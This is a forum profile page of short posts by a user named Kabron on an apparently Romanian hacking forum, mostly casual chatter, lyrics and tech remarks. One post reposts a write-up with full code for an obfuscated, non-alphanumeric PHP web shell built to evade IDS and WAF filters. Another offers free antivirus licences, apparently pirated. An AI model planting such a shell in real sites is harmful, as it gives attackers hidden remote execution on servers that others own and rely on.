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Everything posted by Kabron

  1. M2G vezi c? mi-a dat loppa id t?u ?i am dat add pe Y!
  2. Bun, dup? cum spune ?i titlul am nevoie de un programator java, skides s? se ab?in?. #Vor avea loc probe Este vorba despre un proiect pe target gaming, totul este pl?tit. Mai multe informa?ii dup?.
  3. Bre Pa?a ce leg?tur? are site-ul unde a avut loc cryptarea ? Este acela?i algoritm. Poate nu a realizat criptarea pe un anume website, la asta te-ai gândit ? Also : mi?to copy/Ponta ai f?cut ?i tu de aici : MD5 - Wikipedia Era greu s? explici folosind cuvintele tale?
  4. E incredibil cum cineva înc? sper? c? se mai poate face ceva...
  5. Regale gratis ESET NOD32 Antivirus bafta
  6. wrong , my bad. delete careva?
  7. Kabron

    Oferta Goddady

    ahaha ce chestie , au pierdut cam 31k domenii pentru faza cu SOPA , era de asteptat asa ceva.
  8. Vor veni mai multe curând Spa?iu s? fie ?i oameni s? citeasc?. Mul?an' tex pentru "depozit".
  9. "54|u7473 7u7ur0r " dac? scrii normal te doare mâna ? Bun venit
  10. Mul?an' frumos !
  11. Mai multe aici : http://raz0r.name/mysli/backdoor-in-trigger/ asta ai uitat P.S ma bucur c? cite?ti ce pun )
  12. After my release about the Tiny PHP Shell, Mr. Gareth Hayes @ The Spanner made a non-alphanumeric variant. I got inspired by his nifty script and started researching further. My main plan was to create an array of data with different values in order to have something to work with. So my first shot was this: @$_[]=@!+_; PHP will try to parse the green underscore as a constant, when the interpreter is unable to find the constant it will prompt you with a notice. I surpress the notice warning using the '@'. The "lost-constant" in turn will be converted to a string (string(1) "_"). Just like Gareth Hayes, I used the plus-operator (red) to cast the string to an integer (int(0)). By appending the exclamation-mark (blue), the value 0 will be casted to a boolean (bool(true)). So far so good! We have a boolean saying true! I try to store it by pushing the value into the array $_ (yellow). However it doesn't exist. By suppressing that too, PHP will automagically create it for you, and your value will get stored That's how I initialize my array. So, what do we do know? Well, just like Mr. Gareth stated, if you try to access an array as a string in PHP. It will generate the string "Array". If we have a string, we can generate other strings out of it by (ab)using AND, OR and XOR. I figured, I had quite a few characters I easily could generate in PHP. So I coded this fuzzer in VB.NET which permutated through AND, OR and XOR and gave me all the combinations that matched any letter in the words GET, POST and REQUEST. (Now when I'm thinking about it later on, I could have added COOKIE too...) Never the less, my fuzzer (phpfuzz.vb) gave me the following results: fuzz_result.txt. By analyzing the results, you'll notice we're able to generate all of those three methods by using only a 15 character list. But for the sake of clarity, I choosed to go with GET. By utilizing some boolean magic and variable dereferencing I ended up with this: <? @$_[]=@!+_;$__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++))].=$_; $_[]=++$__;$_[]=$_[--$__][$__>>$__];$_[$__].$__+$__)+$_[$__-$__]).($__+$__+$__)+$_[$__-$__]; $_[$__+$__]=($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__]); $_[$__+$__].=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__]); $_[$__+$__].=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__]; $_=$ //Fredrik N. Almroth - h.ackack.net $_[$__+$__];$_[@-_]($_[@!+_]); ?> The method for execution used in the Tiny PHP Shell and Gareth's shell remains the same. But if you look at it, I added a few sneak factors. No quotes! Quotes tend to trigger IDS'es and WAF's. No use of functions. No strings. No numbers. No constants. via : Anti Alphanum PHP Shell | Ack Ack
  13. Mi-a pl?cut într-un mod mai .. ciudat Mali Music / The Job Experience (OFFICIAL VIDEO) - YouTube And the cycle goes again... Typical story of A good man, Giving God glory. He's a God fearing man, Perfect husband, Excellent pops and he finally received that raise... Cash in the bank! Yeah, they were saving up. He and his wifey been fussing, It's time for making up. The recessions been digging in you, It's been really rough, But he believes his change is here to stay. It was a Thursday night, April first. He's sitting there in traffic on his way home from work. He checks his voicemail it's his mother. She's got multiple lumps in her breast and they hurt. She wants him to pray that it's not cancerous. Broke the news to your daddy and he's takin it the worst. Cause honestly she knew for many years, but she didn't want the family to panic over her, So he prays: "God save us, lord I know that you are able, I'm lifting up my heart to you in prayer, your a healer your the Savior, So save us. So he goes to call the boo to tell her all that happened and to let her know the news. It's looking like it's 6: 22. She should be whipping up the dinner, Got the kiddies home from school, But every time he calls it goes straight to her voicemail "Just leave your? number, And I'll get right back with you". He thinks nothing of it and he cruises the rest of the way trying to clear his mind. He pulls into the house, He's so unfocused. Walks right in he's wondering "why was the front door wide open? " Goes to the living room, There's two man holding guns to his family's face: his wife, His youngest and his oldest. They yelling "get the money, Hit the floor man! " He pulls the money out he kneels down and says, "Just go, man! " The robber kneels down to get the dough and forgets his fingers on the trigger and he accidentally blows and [gunshot] Jesus, can You even see us? I gave You all of me because I thought You could protect us, Lead us and direct us. But you can't even keep us safe from violence and diseases, I'm really wanting to believe in You, But I need a reason to trust You after this one... because you let me down, because you let me down Then God says, I am the Lord your God, There's majesty and splendor round about Me. It's very sad, but true, that very often your faith fails you and you doubt me. Woe oh oh. But I'm so sovereign and above, I give you power to believe you're all in control, But I'm super! And I'm? set to show myself so strong in a realm of the living that leaves the whole world In a stupor. And by the way I caused the bullet shot to ricochet right back into the shooter!
  14. Iar 3 pagini despre un rahat De ce nu discutati asta pe realitatea, cancan etc ? ..............
  15. Ar fii frumos din partea ta sa iti faci propriul tau design , putin respect pentru str0ke zic eu
  16. Se mai întâmpl? stiua?ii de genul ?sta , eu p??eam a?a ceva când faceam încarcare pentru clien?i. Poti face o plângere c?tre cosmote folosind hârtia codului de încarcare ?i un formular pentru a?a ceva de pe internet iar teoretic se verific? ?i se remediaz? ( nu fac niciodat? a?a ceva ) . Alt? solutie ( cel pu?in pentru mine ) era s? vorbesc cu tipa ce reprezenta Cosmote pe jude? ?i avea 'grija' de noi , tu poti incerca dac? mai ai h?rtia s? te duci la cosmote ( magazin ) ?i s? te ajute de acolo.
  17. Alt? simpl? întrebare : Cui îi pas? ? P.S nu nu a luat.
  18. lol , bravo ma )
  19. Dac? nu m? însel se poate MITM via router
  20. am luat local-host.in , curios cat dureaza pana-l suspenda meahh : Your website is initially created and published on a subdomain (eg: gibo-example-primary.hostagator.co.in) Once we’ve verified your business we migrate your website to the domain name you chose (local-host.in.) This may take a few days, so please be patient.
  21. Si eu vreau sa arunc un ochi
  22. Diacritic Te-ai pierdut prin imensul meu post si nu ai citit tot ? Eu am precizat destul de clar ( update-uri la zi , in ideea ca daca ii dadeam update totul era ok , se realiza ) . O licenta ce este in blacklist nu cred ( nu am folosit prea mult nod32 ca sa stiu ce si cum ) ca ar fii necesar sa spuna ca a expirat in 1970 si totusi sa faca update-urile . Chiar si asa , faza este amuzanta pentru mine , sectiunea este offtopic . Asa , sa explic sa inteleaga si domnul de mai sus Omule la blacklist ( tocmai mi-a confirmat cineva ) nu se schimba anul . Licenta era asa cand am vazut eu , am dat update de curiozitate sa vad cum reactioneaza , a fost ok , si-a facut treaba . O licenta ce se afla in blacklist nu face asta. Priceput ? Ok,bine,PA!
  23. Acum 2 zile am fost rugat de cineva din Spania sa o ajut putin cu pc-ul , intru ( TW) si vad asta : http://i39.tinypic.com/zurtd1.png Destul de misto , ha ? P.S update-urile erau la zi
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